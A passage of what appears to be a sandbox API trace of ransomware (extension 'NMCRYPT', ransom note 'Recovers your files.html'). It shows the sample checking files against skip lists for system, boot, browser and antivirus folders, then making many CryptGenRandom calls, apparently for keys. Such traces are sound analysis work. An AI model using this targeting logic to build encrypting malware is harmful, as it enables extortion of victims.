[0154.643] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*NTUSER.DAT*") returned 0 [0154.643] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*AppData*") returned 0 [0154.643] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*\\winrar\\*") returned 0 [0154.643] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0154.644] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*\\java\\*") returned 0 [0154.644] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0154.644] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*\\windows\\*") returned 0 [0154.644] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*\\ESET\\*") returned 0 [0154.644] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*\\AVG\\*") returned 0 [0154.644] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*\\AVIRA\\*") returned 0 [0154.644] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0154.644] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*Atheros*") returned 0 [0154.644] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*Realtek*") returned 0 [0154.644] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*bootmgr*") returned 0 [0154.644] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*boot*") returned 0 [0154.644] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*boot*") returned 0 [0154.644] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*CONFIG.SYS*") returned 0 [0154.644] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*IO.SYS*") returned 0 [0154.644] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*MSDOS.SYS*") returned 0 [0154.644] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*NTDETECT.COM*") returned 0 [0154.644] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*ntldr*") returned 0 [0154.644] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*chrome*") returned 0 [0154.644] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*opera*") returned 0 [0154.644] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*firefox*") returned 0 [0154.644] wcslen (_String="\\\\?\\") returned 0x4 [0154.644] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad838 [0154.644] wcscmp (_String1=".", _String2=".") returned 0 [0154.644] FindNextFileW (in: hFindFile=0x9ad838, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0154.644] wcscmp (_String1="..", _String2=".") returned 1 [0154.644] wcscmp (_String1="..", _String2="..") returned 0 [0154.644] FindNextFileW (in: hFindFile=0x9ad838, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0154.644] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0154.644] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0154.644] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0154.644] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0154.644] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0154.644] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0154.644] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0154.644] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0154.644] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0154.644] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0154.644] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0154.644] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0154.644] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0154.645] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0154.645] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0154.645] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0154.645] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0154.645] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0154.645] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0154.645] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0154.645] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0154.645] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0154.645] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0154.645] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0154.645] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0154.645] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0154.645] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0154.645] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0154.645] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0154.645] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0154.645] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0154.645] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0154.645] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0154.645] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0154.645] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui", pszSpec="*") returned 1 [0154.645] strlen (_Str="NMoreira") returned 0x8 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: 